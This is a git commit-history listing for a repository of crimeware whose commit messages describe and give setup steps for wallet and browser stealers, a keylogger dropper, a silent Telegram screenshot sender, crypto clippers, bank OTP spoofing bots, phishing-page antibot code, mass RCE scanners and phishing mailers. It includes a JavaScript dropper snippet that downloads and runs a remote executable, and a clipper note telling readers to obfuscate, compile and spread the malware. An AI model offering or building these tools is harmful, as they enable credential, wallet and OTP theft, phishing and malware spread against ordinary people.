Commit graph

38 commits

Author SHA1 Message Date
bl4d3rvnner7
973a43d8de
Update README.md 2025-06-17 15:39:44 +02:00
bl4d3rvnner7
ca5ed8bddc
Office365 SMTP Cracker💕
Language : Python
Format : combo (email:pass)
Reason : Hitstealer
2025-06-15 20:46:42 +02:00
bl4d3rvnner7
f75bbddcd7
🤑 LogSearch Tool for Logs
🟠Remove Duplicates from Logs
🟠Remove 'UNKNOWN' from Logs
🟠Extract URLs from Logs
🟠Logs to COMBO
🟠Extract Specific Pattern

 How to run 

python logsearch.py
2025-06-15 20:45:44 +02:00
bl4d3rvnner7
a82986885b
🚀 ArtHouse Wallet Stealer 🐍
🚀 ArtHouse Wallet Stealer 🐍

💎 What Does It Do?

🔵Kills over 70+ browser processes (Chrome, Edge, Brave, Firefox, and more!)
🔵Stops Wallet Processes (MetaMask, Exodus, Trust Wallet, etc.) 💰
🔵Extracts Wallet Data (Locate & Copy Wallet Data)
🔵Copies the found wallets to Documents\HWID\Wallets folder

😂 Why ?

️Because ArtHouse are scammers (https://t.me/c/1154385673/8702), they scammed me for botnet log training and this is the revenger.

How to Get Started

1️⃣Download Python, get some wallets.

2️⃣Install psutil over pip:

pip install psutil

3️⃣Run script:

python3 wallet_stealer.py

⚠️ Warning: This tool is powerful! Use it responsibly and ensure you have backups of important data.
2025-06-15 20:44:53 +02:00
bl4d3rvnner7
e1e3b74f11
🤖 BotMother Antibots 🤖
🤖 BotMother Antibots 🤖

🟢BotMother Antibots is used by Phishing Pages to keep Bots away from your Phishing site. 

🔑 Features

▶️IP Blocking (Single/Ranges)
▶️Country Blocking
▶️User-Agent Blocking
▶️Cookie Fingerprint (bot don't use cookies)  
▶️Header/Agent Deep Checks
▶️Redirection
▶️Logging
▶️Rate Limit Requests (30/minute)
▶️Test Mode for Developer.

👩‍💻 Code Implementation (Assuming the folder is in the current directory as "botMother"):

require (__DIR__).'/botMother/botMother.php';
$bm = new botMother();
$bm->setExitLink("https://www.chase.com/"); / Redirect blocked bots to Chase
$bm->setGeoFilter("de,us,fr,uk"); // Allows Germany, USA, France, UK
$bm->setTestMode(false); // Disable test mode (real IP checks)
$bm->limitRequests(30, 60); // 30 requests/minute
$bm->validateHeaders(); // Check for bots/tools
$bm->checkFingerprint(); // Verify JS support (cookie)
$bm->run();

👍 For a example, checkout example.php, use the JavaScript at your Phishing Page, or else don't run "checkFingerprint".

ℹ️ You can put multiple countries on the allow list but also one.
2025-06-15 20:35:31 +02:00
bl4d3rvnner7
1373292f2f
💻 OWA Extractor & Validator 💻
💻 OWA Extractor & Validator 💻

🔵This tool scans and validates emails by checking Outlook Web Access (OWA) portals. It extracts unique email addresses, verifies webmail logins, and sorts the results into organized files.

🔍 Features

 Multi-threaded for high speed
 Extracts & validates emails from webmail portals
 Saves sorted results into files
 Customizable via Settings.yml

💻 Setup & Run

1️⃣ Install dependencies

pip install requests beautifulsoup4 pyyaml colorama

2️⃣ Edit Settings.yml to configure threads & timeout. (you can leave by default). Put your emails (only emails) into Emails.txt.

3️⃣ Run the script

python OWA Extractor.py

4️⃣ Extracted emails will be saved in the Result/ folder.
2025-06-15 20:32:26 +02:00
bl4d3rvnner7
8f82a88b60
🐍 Kazbot
🐍 Kazbot 

💎Features

🔵IP Address Generator
🔵Random IP Address Generator with IP Range
🔵HTTP IP Address Checker With Port Scanner
🔵AWS API Key Generator
🔵Sendgrid API Key Generator
🔵Mass Laravel Validator
🔵Mass Laravel Database Scanner
🔵Mass Laravel SMTP Scanner
🔵Mass Laravel Config Scanner
🔵Mass Hidden Config Scanner
🔵Mass CMS Scanner
🔵Mass PHPUnit RCE Exploiter
🔵Mass Reverse IP Scanner
🔵Mass Reverse IP Scanner
🔵Mass Reverse Domain to IP Address
🔵Mass Subdomain Enumeration Scanner
🔵Mass PayPal Email Validator
🔵Mass Email Validator
🔵Mass Twilio Checker
🔵Mass AWS Checker
🔵Mass AWS EC2 Checker
🔵Mass Sendgrid API Key Checker

⚙️ Setup

pip install requests ipaddress numpy configparser twilio boto3 botocore rich

ℹ️ Change Results after running bot once in "FuckBot.ini".
2025-06-15 20:31:11 +02:00
bl4d3rvnner7
c6241f1639
🛡 Botfaqtor "Antibot" Source Code
🛡 [LEAK] Botfaqtor "Antibot" Source Code [JS]
👨‍💻 Full breakdown of the frontend client logic used by Botfaqtor to detect bots, ad fraud, and fingerprint users

🔍 I sourced the CDN-loaded JavaScript from cdn.botfaqtor.ru/one.js, as seen on sites like whoer.net (likely using the "Basic Plan" for ~7125₽/3mo).

📁 File Structure & What Each File Does:

.
├── adsProtect.js              # Ad click fraud protection logic
├── base.js                    # Shared logic/utilities
├── core/
│   ├── block.js               # Triggers and conditions to block traffic
│   ├── client.js              # Main initializer for browser fingerprinting
│   ├── criterias.js           # Rules to classify bot/human behavior
│   ├── events.js              # Captures user interaction (mousemove, etc.)
│   ├── evercookie/            # Persistent tracking (localStorage, cookies, etc.)
│   ├── fingerprint.js         # Core fingerprint generation
│   ├── fingerprint_js2.js     # Compatibility/alternative fingerprint module
│   ├── http.js                # Sends fingerprint to Botfaqtor API
│   ├── sucessCaptchaSettingsPanel.js # UI component (post-captcha)
│   └── viewInstalledCodePanel.js     # Internal debug/view panel
├── fp.js                      # Entry point to gather full fingerprint data
├── getCounters.js             # User action counters (clicks, focus, etc.)
├── index.js                   # Main launcher (bootstraps everything)
├── loadIframe.js              # Possibly sandbox or honeypot iframe logic
├── slider/                    # CAPTCHA UI module
│   ├── captcha_edit.js
│   └── captcha_edit_styles.js
├── slider.js                  # Core slider CAPTCHA control
├── status_async.js            # Asynchronous botcheck status handler
├── status.js                  # Sync status evaluation
├── styles.js                  # Inline style management
├── utils.js                   # General-purpose utilities
└── node_modules/
    ├── events/                # Event system
    └── ua-parser-js/          # Parses user-agent into OS/browser/device

🧠 The fp.js script alone contains over 40+ fingerprinting signals including:

🔵Headless/browser detection
🔵Adblock detection
🔵OS/browser inconsistencies
🔵Canvas/WebGL/Audiocontext fingerprinting
🔵Language spoofing detection
🔵Evercookie support
🔵WebDriver + PhantomJS detection
... and more, checkout "list.txt"

ℹ️ For analysis and educational purpose only, how your activity can be tracked.
2025-06-15 20:28:53 +02:00
bl4d3rvnner7
09578f0153
Silent Telegram Screenshot Sender
Silent Telegram Screenshot Sender [Source Code] 👩‍💻

🧾 Prerequisites

To compile and run this C# program, you need:

 Option 1: .NET SDK / Visual Studio Developer Command Prompt

▶️Install .NET SDK (https://dotnet.microsoft.com/en-us/download/dotnet) or
▶️Use Visual Studio with the Developer Command Prompt

 Option 2: Use csc.exe from Windows

* Comes with .NET Framework (on most Windows systems)
* Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

🔧  Compilation

1️⃣ Save the Code

Create a new text file, e.g., Program.cs, and paste the full C# code into it. Replace:

string token = "";
string chatId = "";

with your actual Telegram bot token and chat ID.

2️⃣Open CMD / PowerShell

Navigate to the directory where Program.cs is saved.

3️⃣Compile with CSC

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /target:exe /platform:x86 /optimize Program.cs

 This creates a file: Program.exe in the same folder.

If you're on 64-bit Windows, you can also try:

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /target:exe /platform:x64 /optimize Program.cs

4️⃣ Run the Program

Now just execute the program:

Program.exe

🔴No window will open.
🔴No file will be saved.
🔴Screenshot is sent silently via Telegram.

💎 Features of the source code:

 Silent execution
🖼 Screenshot functionality
🖼 Telegram upload
💾 No file saved locally
🔄 Error fallback
🛠 Embedded Win32 calls
2025-06-15 20:27:54 +02:00
bl4d3rvnner7
ffdd6ae068
AutoLog Keylogger [Source Code] 👩‍💻
💎 Features of the Source Code  

▶️ stub.au3: Dropper that extracts AutoUpdate.exe, Emai.exe, Scre.exe to C:\ProgramData\Skype, downloads LaZagne.exe for credential dumping, collects system info (Antivirus, antivirus, OS, CPU, IP), sets persistence, bypasses UAC, disables antivirus (244+ processes), and clears browser data.  
▶️ Emai.au3: Sends log files (Passwords.txt, Info.txt, logs_*.htm) from C:\ProgramData\Skype via Gmail SMTP, deletes logs after sending, runs silently with admin privileges.  
▶️ Scre.au3: Captures desktop screenshots and webcam images using DirectShow, sends them via Gmail SMTP, deletes files after sending, runs stealthily.  
▶️ Main.au3: Nearly identical to Scre.au3, captures screenshots and webcam images, likely the source for Scre.exe.  
▶️ All scripts use obfuscation, run silently (#NoTrayIcon), and require admin privileges (#RequireAdmin). Outputs are saved to C:\ProgramData\Skype (stub.au3, Emai.au3) or C:\Windows\log (Scre.au3, Main.au3).
2025-06-15 20:27:00 +02:00
bl4d3rvnner7
d3cc5213a6
🚀 LetterSafe - HTML Encrypter & Decryptor Pro 🔐
 Features

🔵 Three Encryption Levels
🔵 Basic (Small & simple (wraps your code in a JS unescape))
🔵 Full (Hex-based encoding for added obfuscation)
🔵 Advanced (Base64 + shuffle + encryption key)

▶️ One-Click Decryption
▶️ Automatically detects encoding type and recovers original code
▶️ Dark/light theme toggle
▶️ File size & compression ratio display
▶️ Live preview for input/output
▶️ One-click copy & select-all
▶️ Clear fields instantly

☑️ Works entirely in your browser (offline)

🛠 How To Use

1️⃣Paste your HTML or JavaScript code in the Input field

2️⃣ Choose your encryption level: Basic, Full, or Advanced

3️⃣ Click Encode, the encrypted code appears in the output field

4️⃣Click Decode to reverse the encryption

5️⃣ Use Preview to check the live result

6️⃣ Copy it or select all with a single click
2025-06-15 20:24:14 +02:00
bl4d3rvnner7
e3cb31052b
✉️ Bec Mailer 1.0 [leafmailer edit]
🔑 Password: bectools
2025-06-15 20:22:28 +02:00
bl4d3rvnner7
9fea1b8633
Update README.md 2025-06-15 02:29:31 +02:00
bl4d3rvnner7
1c0d32e846
Update README.md 2025-06-15 02:28:55 +02:00
bl4d3rvnner7
e10d5e8232
📋 Multi Wallet Clipper C# 📋
- Bitcoin (BTC)
- Ethereum (ETH)
- Monero (XMR)
- Stellar (XLM)
- Ripple (XRP)
- Litecoin (LTC)
- Namecoin? (NEC)
- Bitcoin Cash (BCH)
- Dash (DASH)
2025-06-15 02:26:18 +02:00
bl4d3rvnner7
86b26ec5e6
📋 Crypto Clipper [c#/vb.net] 📋 2025-06-15 02:12:15 +02:00
bl4d3rvnner7
bdc0bd87b0
🦈 Sharp Stealer Source Code [C#]
.
├── SHARPIL
│   ├── app.manifest
│   ├── BrowserProcessor.cs
│   ├── Program.cs
│   ├── Properties
│   │   └── AssemblyInfo.cs
│   ├── SHARP
│   │   ├── AES.cs
│   │   ├── AesGcm.cs
│   │   ├── Armory.cs
│   │   ├── AtomicWallet.cs
│   │   ├── AutoFill.cs
│   │   ├── Banking.cs
│   │   ├── BCrypt.cs
│   │   ├── BillingResponseJsonFormat.cs
│   │   ├── BitcoinCore.cs
│   │   ├── Bookmark.cs
│   │   ├── Bookmarks
│   │   │   └── Bookmarks.cs
│   │   ├── Brave.cs
│   │   ├── Browser.cs
│   │   ├── BrowserUtils.cs
│   │   ├── BSSID.cs
│   │   ├── Buffers.cs
│   │   ├── Bytecoin.cs
│   │   ├── cBrowserUtils.cs
│   │   ├── Chrome.cs
│   │   ├── Chromium
│   │   │   ├── Autofill.cs
│   │   │   ├── Bookmarks.cs
│   │   │   ├── cAesGcm.cs
│   │   │   ├── cBCrypt.cs
│   │   │   ├── Cookies.cs
│   │   │   ├── CreditCards.cs
│   │   │   ├── Crypto.cs
│   │   │   ├── Downloads.cs
│   │   │   ├── History.cs
│   │   │   ├── Parser.cs
│   │   │   ├── Passwords.cs
│   │   │   └── Recovery.cs
│   │   ├── Chromiums.cs
│   │   ├── Common.cs
│   │   ├── Comodo.cs
│   │   ├── Config.cs
│   │   ├── Cookie.cs
│   │   ├── CookieFormat.cs
│   │   ├── Cookies
│   │   │   └── Cookies.cs
│   │   ├── CookieSteam.cs
│   │   ├── Counting.cs
│   │   ├── CreditCard.cs
│   │   ├── CyberGhost.cs
│   │   ├── DashCore.cs
│   │   ├── Decryptor.cs
│   │   ├── DirectShow.cs
│   │   ├── DiscordAccountFormat.cs
│   │   ├── Discord.cs
│   │   ├── Edge
│   │   │   ├── Autofill.cs
│   │   │   ├── Bookmarks.cs
│   │   │   ├── CreditCards.cs
│   │   │   └── Recovery.cs
│   │   ├── Edges.cs
│   │   ├── Electrum.cs
│   │   ├── EpicPrivacy.cs
│   │   ├── Ethereum.cs
│   │   ├── Exodus.cs
│   │   ├── ExpressVPN.cs
│   │   ├── Filemanager.cs
│   │   ├── Files.cs
│   │   ├── FileZilla.cs
│   │   ├── Firefox
│   │   │   └── Recovery.cs
│   │   ├── GenStrings.cs
│   │   ├── GetFiles.cs
│   │   ├── GiftFormat.cs
│   │   ├── GiftResponseJsonFormat.cs
│   │   ├── Help.cs
│   │   ├── History
│   │   │   └── History.cs
│   │   ├── IFolders.cs
│   │   ├── IJsonSerializerStrategy.cs
│   │   ├── ip.cs
│   │   ├── Iridium.cs
│   │   ├── Jaxx.cs
│   │   ├── JsonArray.cs
│   │   ├── Json.cs
│   │   ├── JsonObject.cs
│   │   ├── LitecoinCore.cs
│   │   ├── LocationInfo.cs
│   │   ├── MinecraftStealer.cs
│   │   ├── Monero.cs
│   │   ├── NordVPN.cs
│   │   ├── Nss3.cs
│   │   ├── OpenVPN.cs
│   │   ├── Opera.cs
│   │   ├── OperaGx.cs
│   │   ├── Password.cs
│   │   ├── PasswordFormat.cs
│   │   ├── Passwordsq
│   │   │   └── Passwords.cs
│   │   ├── Paths.cs
│   │   ├── PIAVPN.cs
│   │   ├── Pidgin.cs
│   │   ├── PocoJsonSerializerStrategy.cs
│   │   ├── ProcessList.cs
│   │   ├── ProcessListq.cs
│   │   ├── Profile.cs
│   │   ├── Prog.cs
│   │   ├── Promotion.cs
│   │   ├── ProtonVPN.cs
│   │   ├── Psi.cs
│   │   ├── Reflection
│   │   │   └── ReflectionUtils.cs
│   │   ├── SaveData.cs
│   │   ├── Screenchik.cs
│   │   ├── SenderAPI.cs
│   │   ├── SimpleJson.cs
│   │   ├── Site.cs
│   │   ├── Slimjet.cs
│   │   ├── SQLite.cs
│   │   ├── SQLiteHandler.cs
│   │   ├── SqlReader.cs
│   │   ├── Startjabbers.cs
│   │   ├── StartVPN.cs
│   │   ├── StartWallets.cs
│   │   ├── Steam.cs
│   │   ├── Syscalls.cs
│   │   ├── SystemInfo.cs
│   │   ├── Telegram.cs
│   │   ├── TokenResponseJsonFormat.cs
│   │   ├── TokenStealer.cs
│   │   ├── TotalCommander.cs
│   │   ├── UR.cs
│   │   ├── URLSearcher.cs
│   │   ├── UsbCamera.cs
│   │   ├── Vime.cs
│   │   ├── Vivaldi.cs
│   │   ├── WinAPI.2.cs
│   │   ├── WinApi.cs
│   │   ├── Yandex.cs
│   │   └── Zcash.cs
│   ├── SHARPIL.csproj
│   ├── SHARPIL.ico
│   ├── SHARPIL.Properties.Resources.resources
│   └── SHARP_STEALER
│       └── Properties
│           ├── Resources.cs
│           ├── Settings.Designer.cs
│           └── Settings.settings
├── SHARPIL.sln
└── SHARPIL Source
    ├── app.manifest
    ├── BrowserProcessor.cs
    ├── Program.cs
    ├── Properties
    │   └── AssemblyInfo.cs
    ├── SHARP
    │   ├── AES.cs
    │   ├── AesGcm.cs
    │   ├── Armory.cs
    │   ├── AtomicWallet.cs
    │   ├── AutoFill.cs
    │   ├── Banking.cs
    │   ├── BCrypt.cs
    │   ├── BillingResponseJsonFormat.cs
    │   ├── BitcoinCore.cs
    │   ├── Bookmark.cs
    │   ├── Bookmarks
    │   │   └── Bookmarks.cs
    │   ├── Brave.cs
    │   ├── Browser.cs
    │   ├── BrowserUtils.cs
    │   ├── BSSID.cs
    │   ├── Buffers.cs
    │   ├── Bytecoin.cs
    │   ├── cBrowserUtils.cs
    │   ├── Chrome.cs
    │   ├── Chromium
    │   │   ├── Autofill.cs
    │   │   ├── Bookmarks.cs
    │   │   ├── cAesGcm.cs
    │   │   ├── cBCrypt.cs
    │   │   ├── Cookies.cs
    │   │   ├── CreditCards.cs
    │   │   ├── Crypto.cs
    │   │   ├── Downloads.cs
    │   │   ├── History.cs
    │   │   ├── Parser.cs
    │   │   ├── Passwords.cs
    │   │   └── Recovery.cs
    │   ├── Chromiums.cs
    │   ├── Common.cs
    │   ├── Comodo.cs
    │   ├── Config.cs
    │   ├── Cookie.cs
    │   ├── CookieFormat.cs
    │   ├── Cookies
    │   │   └── Cookies.cs
    │   ├── CookieSteam.cs
    │   ├── Counting.cs
    │   ├── CreditCard.cs
    │   ├── CyberGhost.cs
    │   ├── DashCore.cs
    │   ├── Decryptor.cs
    │   ├── DirectShow.cs
    │   ├── DiscordAccountFormat.cs
    │   ├── Discord.cs
    │   ├── Edge
    │   │   ├── Autofill.cs
    │   │   ├── Bookmarks.cs
    │   │   ├── CreditCards.cs
    │   │   └── Recovery.cs
    │   ├── Edges.cs
    │   ├── Electrum.cs
    │   ├── EpicPrivacy.cs
    │   ├── Ethereum.cs
    │   ├── Exodus.cs
    │   ├── ExpressVPN.cs
    │   ├── Filemanager.cs
    │   ├── Files.cs
    │   ├── FileZilla.cs
    │   ├── Firefox
    │   │   └── Recovery.cs
    │   ├── GenStrings.cs
    │   ├── GetFiles.cs
    │   ├── GiftFormat.cs
    │   ├── GiftResponseJsonFormat.cs
    │   ├── Help.cs
    │   ├── History
    │   │   └── History.cs
    │   ├── IFolders.cs
    │   ├── IJsonSerializerStrategy.cs
    │   ├── ip.cs
    │   ├── Iridium.cs
    │   ├── Jaxx.cs
    │   ├── JsonArray.cs
    │   ├── Json.cs
    │   ├── JsonObject.cs
    │   ├── LitecoinCore.cs
    │   ├── LocationInfo.cs
    │   ├── MinecraftStealer.cs
    │   ├── Monero.cs
    │   ├── NordVPN.cs
    │   ├── Nss3.cs
    │   ├── OpenVPN.cs
    │   ├── Opera.cs
    │   ├── OperaGx.cs
    │   ├── Password.cs
    │   ├── PasswordFormat.cs
    │   ├── Passwordsq
    │   │   └── Passwords.cs
    │   ├── Paths.cs
    │   ├── PIAVPN.cs
    │   ├── Pidgin.cs
    │   ├── PocoJsonSerializerStrategy.cs
    │   ├── ProcessList.cs
    │   ├── ProcessListq.cs
    │   ├── Profile.cs
    │   ├── Prog.cs
    │   ├── Promotion.cs
    │   ├── ProtonVPN.cs
    │   ├── Psi.cs
    │   ├── Reflection
    │   │   └── ReflectionUtils.cs
    │   ├── SaveData.cs
    │   ├── Screenchik.cs
    │   ├── SenderAPI.cs
    │   ├── SimpleJson.cs
    │   ├── Site.cs
    │   ├── Slimjet.cs
    │   ├── SQLite.cs
    │   ├── SQLiteHandler.cs
    │   ├── SqlReader.cs
    │   ├── Startjabbers.cs
    │   ├── StartVPN.cs
    │   ├── StartWallets.cs
    │   ├── Steam.cs
    │   ├── Syscalls.cs
    │   ├── SystemInfo.cs
    │   ├── Telegram.cs
    │   ├── TokenResponseJsonFormat.cs
    │   ├── TokenStealer.cs
    │   ├── TotalCommander.cs
    │   ├── UR.cs
    │   ├── URLSearcher.cs
    │   ├── UsbCamera.cs
    │   ├── Vime.cs
    │   ├── Vivaldi.cs
    │   ├── WinAPI.2.cs
    │   ├── WinApi.cs
    │   ├── Yandex.cs
    │   └── Zcash.cs
    ├── SHARPIL.csproj
    ├── SHARPIL.ico
    ├── SHARPIL.Properties.Resources.resources
    └── SHARP_STEALER
        └── Properties
            ├── Resources.cs
            ├── Settings.Designer.cs
            └── Settings.settings
2025-06-11 00:29:13 +02:00
bl4d3rvnner7
f83f47a6ef
🤖 LEGION BOT V6.6 SOURCE CODE [PY] 🤖
Tool in image represented.

settings.ini is for the settings, you can put there telegram bot token and so on.

⚙️ SETUP 

Open settings.ini, put values. Then install requirements : 

requests
colorama
bs4
ipaddress
urllib3
rich
botocore
discord
ipranges
telepot
pystyle
vonage
twilio

If there are any other requirements, write them in the comments.

️ Some people still get errors, post them down below. Questions about installing modules will be ignored because it is already clarified how to install.

To run the tool, use python3 legion.py
2025-05-18 01:49:59 +02:00
bl4d3rvnner7
00aad83c6e
🔥 F-Automatical v8 [FREE]
F-Automatical v8 [FREE]
Python 2.7 (Recommended)

🔥  Source code and fully deobfuscated by @scarletta_owner  🔥 
FOX = F-Automatical v8

⚠️ This tool used imgur and gyazo api keys from fox himself. The tool was 1:1 copied from the cyber fox security channel which claim to be the latest fox channel. The function at line 120 and 129 are definitely showing us how the screens with HIS api keys been uploaded. Basically chromium was used to make a screen of your shells/cpanel pass resets on your email. The email was created to receive the passwords but basically he's checking new mails with api calls and not with chromium. Chromium driver was especially used to make screens and upload it on his api.
2025-05-18 01:49:30 +02:00
bl4d3rvnner7
5c18680522
🧘 IP Ranger Source [PY] 🧘
⚙️ Need : IP List
What does it do ?

It ranges the IPs from f.e.
13.46.120.2

To :
13.46.120.1
13.46.120.2
13.46.120.3
13.46.120.4
...

From 1 to 256.
2025-05-18 01:49:04 +02:00
bl4d3rvnner7
de728eb2e3
📋 CLIPPER SOURCE CODE [PY] 📋
How to use ? 

Install requirements like pyperclip, pyautogui, telebot and requests. Make script main.py and paste code, setup telegram bot and replace your BTC address. Obfuscate the source code, compile to EXE and spread.
2025-05-18 01:48:35 +02:00
bl4d3rvnner7
bc827aa0ab
SPOOFING OTP BOT
SPOOFING OTP BOT OR BYPASS BOT
This is a dream bot for y’all ain’t no where else got it, 
Will fetch code always around 190+ Countries for u ,Uses Plivo API

US , UK , CANADA.. Every country  almost every bank 

Won’t even need simswap or email access to fetch codes using this bot and it works instantly 

« About OTPSPOOF_BOT »
1. Multiple modes to choose from
 PGP MODE
 PRESS 1 MODES
 REGULAR CALL MODES
 NO PRESS 1 CUSTOM MODE
 SIMPLE MODE
2. Unique scripts for each mode
 ALL LANGUAGES
 BANK SPOOFING 
 EVENTS 
 MORE
3. ALL countries supported

« Modes »
Bank mode / PayPal mode /
Account mode / Apple pay mode / Email mode / Carrier mode / Pin mode /
P2P mode (allows you to connect to the victim with a P2P encrypted call)
Adding accept / deny
Adding recordings 
Adding press 1 custom mode 
Referral System
 Hold / Unhold

ALL ARE UP
2025-05-18 01:47:55 +02:00
bl4d3rvnner7
ae2025229e
🤖 OTP BOT [TWILIO]
Uses Twilio API and it's open source you can recode it

Unzip ur files and Download ngrok and run ngrok.exe http 5000

Download python

Open terminal and install modules

pip install flask
pip install requests
pip install phonenumbers
pip install twilio
pip install pyTelegramBotAPI

• Open cred.py and replace with your data 
• Open connect dbase file for host it
• Open terminal and Run Python mainn.py

Instructions in readme.txt
2025-05-18 01:47:38 +02:00
bl4d3rvnner7
9af33c9435
[SMS Framework] [Source Code] [PY]
Number Carrier Checker
 - Fast Unlimited Queries
 - No Need Proxies
 - Lifetime Validity

* Generate Numbers by State
* Generate Numbers by Area Code
* Generate Numbers by Prefix
2025-05-18 01:43:36 +02:00
bl4d3rvnner7
c5f78fd5e3
📧 SMTP Checker v1.3 (2024) 📧
⚙️ Setup:

1️⃣ Create a text-file and name it whatever you want

2️⃣ Put your SMTPs inside, else copy results SMTP file and make sure you use following format:

host|port|user|pass

3️⃣ Install Python (If not installed)

Direct installer : 
https://www.python.org/ftp/python/3.9.2/python-3.9.2-amd64.exe

Linux:

sudo apt install python3
 

Usage:

python3 smtp.py
 (Linux)
py smtp.py (Windows)

1️⃣ Enter textfile name
2️⃣ Enter your email
2️⃣ Enter threads (5 are ok)

♦️ FEATURES 
▪️Open Source 
▪️No Backdoors
▪️No Trojan/Virus
▪️Successfully sent will be saved as "good.txt"
▪️Fast checking
2025-05-18 01:42:56 +02:00
bl4d3rvnner7
8048d11754
👨‍💻 Simple Malware JS Dropper Source Code 👨‍💻
🔥 This code is a simple dropper, used recently by spreader. It will be obfuscated to avoid antivirus protection. To make sure how the script works, let me explain.

1️⃣ Download Payload

The script uses an HTTP request to download an executable file (windows.exe) from a specified URL (fileUrl).

var fileUrl = "https://url.com/windows.exe";
var httpRequest = WScript.CreateObject("Microsoft.XMLHTTP");
httpRequest.open("GET", fileUrl, false);
httpRequest.send();

2️⃣ Save the Payload 

The script saves the downloaded file to a specific location on the user's file system, either in the temporary files directory or the application data directory.

var stream = WScript.CreateObject("Adodb.Stream");
stream.Type = 1; // binary
stream.open();
stream.write(httpRequest.responseBody);
stream.savetofile(fileName, 2); // save to file
stream.close();

3️⃣ Execute the Payload

After saving the file, the script executes it. It checks the file extension to determine the appropriate method for execution:

➡️.jar files are run using java -jar.
➡️.vbs and .wsf files are run using wscript.
➡️Other file types are executed directly.

if (fileName.endsWith(".jar")) {
    shell.run("java -jar \"" + fileName + "\"");
} else if (fileName.endsWith(".vbs") || fileName.endsWith(".wsf")) {
    shell.run("wscript \"" + fileName + "\"");
} else {
    shell.run("\"" + fileName + "\"");
}

🦅 To edit the script, edit line...

➡️ 10 for the fileName.
➡️ 11 for the fileUrl.
➡️ 12 for the useTempPath (using it would be "true" and doesn't need admin)
2025-05-18 01:42:29 +02:00
bl4d3rvnner7
7a35304194
📱Lufix Sender 1.0 Source Code [PHP]
👉Fully Customizable
👉Source Code
👉Easy-To-Use

How to use

👉Download Apache and create a webserver on your linux/windows RDP. 
👉Get your requirements for mailing ready and start the mailer.
2025-05-18 01:41:55 +02:00
bl4d3rvnner7
9c151e8087
😈 RL Stealer Source Code 👩‍💻
😈 RL Stealer Source Code 👩‍💻

ℹ️ PC Information

🖥 OS, PC Username, Clipboard Text, Launch, Screen Resolution, Current Time, HWID, CPU, RAM, GPU, Geolocation, Log Date, BSSID, AntiVirus

💎 Basic Stealing

🖼 Screenshot
📂 File Grabber
💬 Telegram
💸 Wallets (Armory, Atomic, BitcoinCore, Bytecoin, DashCore, Electurm, Etherum, Litecoin, Monero, Exodus, Jaxx, ZCash)
💬 Discord
😥 FileZilla
👩‍💻 Browser Stealing (Chrome, Edge, FireFox, Opera)
  🗝 Passwords
   History
  🍪 Cookies
  📝 AutoFills
  💳 CC
  🔖 Bookmarks
  ⬇️ Downloads

🌐 Supported Browsers : Chromium, Google Chrome, Opera, Chrome Plus, Iridium, 7Star, CentBrowser, Chedot, Vivaldi, Kometa, Elements, Epic Privacy Browser, Uran, Sleipnir, Citrio, Coowon, Liebao, QIP Surf, Orbitum, Comodo, Torch, Amigo, 360Browser, Maxthon3, K-Melon, Sputnik, Nichrome, CocCoc, Chromodo, Mail.Ru/Atom, Brave, Mozilla, Waterfox, Thunderbird, PaleMoon, BlackFox, Cyberfox, Microsoft Edge


💎 Advanced Stealing

🎮 Steam
🎮 UPlay
🌐 VPN : NordVPN, OpenVPN, ProtonVPN
:email
💻 Outlook
🌎 VimeWorld


💎 Other Features :

🔗 Domain Detection
💳 Credit Card Detection
🔐 Log Password
💬 Telegram Result
2025-05-18 01:41:13 +02:00
bl4d3rvnner7
9959794c37
LEAF MAILER 2.8 SOURCE CODE 🍁
Leaf mailer is a PHP mailer which is based on the PHPMailer class.
2025-05-18 01:40:35 +02:00
bl4d3rvnner7
78155025fd
Create Bossam Mod Menu PC.gsc
🧿 BOSSAM V6 MOD MENU [BO2] [PC]
2024-04-19 12:17:19 +02:00
bl4d3rvnner7
550774c2ff
🌊 HVNC Malware
Red Binder:
▪️Exe Binder
▪️Inbuilt Undetectable Crypter
▪️Any malware inject with crypter

Red Desktop Builder:
▪️Fully undetectable
▪️Use any installed exe in pc
▪️Use chrome, firefox (Download and execute any file)
▪️View File Explorer
2023-06-18 16:17:17 +02:00
bl4d3rvnner7
4a7aa81721
🧿 BOSSAM V6 MOD MENU [BO2]
Old Black Ops 2 Mod Menu. Source code for coders to see how a menu was made in earlier call of duty's

To use this "Mod Menu" if you have a modded console such as PS3, XBOX or Desktop PC, you need to download GSC studio. It's deprecated but archive.org have a backup

GSC Studio : https://archive.org/download/setup-gscstudio-160215_202109/setup-gscstudio-160215.exe

You can find on Youtube tutorial about injecting a gsc file
2023-06-18 16:14:13 +02:00
bl4d3rvnner7
9960d7497b
📝 EDIFIY - COMBO EDITOR
This tool is a combo editor with 33 editing module, fast speed and a hot UI created by Zentred from cracked(.)io - a hacker forum.

Preview of the tool : https://i.imgur.com/SLh8JVG.png
2023-06-18 16:12:21 +02:00
bl4d3rvnner7
9e77610222
📧 Mail-Check
This tool checks emails for the validity of hotmail, outlook, gmail or office365.
2023-06-18 16:10:15 +02:00
bl4d3rvnner7
01ec233c94
📧 VICTOR3 V2 SENDER
It was a sender for inbox phishing mails to comcast, office365, aol, yahoo and 163.

Preview : https://i.imgur.com/GHatQhJ.png
2023-06-18 16:08:15 +02:00
bl4d3rvnner7
6d520204f1
🤖 LEGION BOT V6.6 2023-06-18 16:03:23 +02:00
bl4d3rvnner7
1bd05304f8
Update README.md 2023-06-18 15:59:11 +02:00
bl4d3rvnner7
0092102f35
Initial commit 2023-06-18 15:56:23 +02:00